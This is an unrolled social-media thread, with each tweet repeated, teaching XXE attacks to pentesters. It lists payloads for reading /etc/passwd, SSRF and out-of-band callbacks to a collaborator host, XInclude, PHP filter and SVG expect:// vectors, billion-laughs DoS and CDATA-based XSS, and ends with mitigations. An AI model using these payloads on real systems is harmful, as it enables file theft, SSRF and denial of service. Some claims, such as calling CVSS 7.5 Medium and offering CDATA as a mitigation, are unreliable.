A comprehensive thread on XXE Attacks.
What is XML, Entities and DTD?
How OWASP Top 10 2021 merged XXE in Security Misconfiguration?
XXE exploitation Types & Payloads for pentesters and bug bounty hunters
↓
{1/18}
Thanks to @shifacyclewala @Hacktifycs
What is XML, Entities and DTD?
How OWASP Top 10 2021 merged XXE in Security Misconfiguration?
XXE exploitation Types & Payloads for pentesters and bug bounty hunters
↓
{1/18}
Thanks to @shifacyclewala @Hacktifycs
→ XXE stands for XML External Entity
→ XXE is possible in applications which processes XML data in client side or server side
→ All Office documents process XML data. Eg -docx,xlsx,pptx
{2/18}
→ XXE is possible in applications which processes XML data in client side or server side
→ All Office documents process XML data. Eg -docx,xlsx,pptx
{2/18}
→ XXE attacks are possible when external entities are included and are processed.
→ OWASP Top 10 2017 introduced XXE at A-4 position.
→ OWASP Top 10 2021 merged in Security Misconfiguration at A-5
{3/18}
→ OWASP Top 10 2017 introduced XXE at A-4 position.
→ OWASP Top 10 2021 merged in Security Misconfiguration at A-5
{3/18}
→ XML stands for extensible markup language
→ XML is like HTML but XML does not have predefined tags and and we can define our own tags.
→ XML language requires all tags to be closed unlike some HTML tags
{4/18}
→ XML is like HTML but XML does not have predefined tags and and we can define our own tags.
→ XML language requires all tags to be closed unlike some HTML tags
{4/18}
→ XML Entities :
To represent some data in XML we will use entities and store data that is some address.
{5/18}
To represent some data in XML we will use entities and store data that is some address.
{5/18}
→ DTD ( Document Type Definition):
It has declarations that can define the structure of an XML document, the types of data values it can have
▶️ Internal DTD: DTD can be fully self-contained within the document itself
▶️ Eternal DTD: It can be loaded from elsewhere
{6/18}
It has declarations that can define the structure of an XML document, the types of data values it can have
▶️ Internal DTD: DTD can be fully self-contained within the document itself
▶️ Eternal DTD: It can be loaded from elsewhere
{6/18}
→ External Website:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "test.com/data" > ]>
→ Internal Website:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///path/to/file" > ]>
{7/18}
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "test.com/data" > ]>
→ Internal Website:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///path/to/file" > ]>
{7/18}
XXE Impact:
→ Exfiltrate data from server like reading content of /etc/passwd or /etc/shadow
→ Escalate to SSRF
→ OOB XXE (External Blind XXE)
→ DOS ( XML Expansion)
→ Remote Code Execution
{8/18}
→ Exfiltrate data from server like reading content of /etc/passwd or /etc/shadow
→ Escalate to SSRF
→ OOB XXE (External Blind XXE)
→ DOS ( XML Expansion)
→ Remote Code Execution
{8/18}
CVSS score of XXE is 7.5 and its severity is Medium with:
→ Improper Restriction of XML External Entity.
→ Local File SSRF
→ Remote File SSRF
→ Billion Laugh Attack
→ XXE via File Upload
{9/18}
→ Improper Restriction of XML External Entity.
→ Local File SSRF
→ Remote File SSRF
→ Billion Laugh Attack
→ XXE via File Upload
{9/18}
XXE Exploitation:
→ Reading System files :
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
→ XXE to SSRF:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "test.com"> ]>
→ OOB XXE:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "collab.burpcollab.net"> ]>
{10/18}
→ Reading System files :
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
→ XXE to SSRF:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "test.com"> ]>
→ OOB XXE:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "collab.burpcollab.net"> ]>
{10/18}
Parametric Entities:
Sometimes application block uses of regular entities so we can use parametric entities.
→ <!ENTITY % xxe "a beautiful entity value" >
Final Payload :
→ <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "collab.burpcollab.net"> %xxe; ]>
{11/18}
Sometimes application block uses of regular entities so we can use parametric entities.
→ <!ENTITY % xxe "a beautiful entity value" >
Final Payload :
→ <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "collab.burpcollab.net"> %xxe; ]>
{11/18}
XInclude attacks:
When you can't modify the DOCTYPE & If server process the user supplied data in SOAP request in back end as it uses XML and parses the XML entities.
→
<foo xmlns:xi="w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
{12/18}
When you can't modify the DOCTYPE & If server process the user supplied data in SOAP request in back end as it uses XML and parses the XML entities.
→
<foo xmlns:xi="w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
{12/18}
Class XXE Base64 Encode:
→ Payload:
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
{13/18}
→ Payload:
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
{13/18}
XXE via file upload svg:
→ Payload:
<svg xmlns="
w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls" width="200" height="200"></image>
</svg>
{14/18}
→ Payload:
<svg xmlns="
w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls" width="200" height="200"></image>
</svg>
{14/18}
XXE via PHP Wrapper:
→ Payload
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contact>
<name>Jean &xxe; Dupont</name>
<zipcode>75000</zipcode>
<city>Paris</city>
</contact>
{15/18}
→ Payload
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contact>
<name>Jean &xxe; Dupont</name>
<zipcode>75000</zipcode>
<city>Paris</city>
</contact>
{15/18}
XXE DOS ( Big Billion Laugh) ⚠️
→ Payload :
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
]>
<data>&a2;</data>
{16/18}
→ Payload :
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
]>
<data>&a2;</data>
{16/18}
XXE to XSS :
→ We can use CDATA of XML to perform this attack
<![CDATA[<]]>img src="" onerror=javascript:alert(1)<![CDATA[>]]>
{17/18}
→ We can use CDATA of XML to perform this attack
<![CDATA[<]]>img src="" onerror=javascript:alert(1)<![CDATA[>]]>
{17/18}
Mitigations for XXE :
→ Disable DTDs (External Entities) completelyfactory.setFeature("apache.org/xml/features/d…", true);
→External entities and external document type declarations must be disabled
→ Use CDATA for ignoring the external entities
{18/18}
→ Disable DTDs (External Entities) completelyfactory.setFeature("apache.org/xml/features/d…", true);
→External entities and external document type declarations must be disabled
→ Use CDATA for ignoring the external entities
{18/18}
• • •
Missing some Tweet in this thread? You can try to
force a refresh
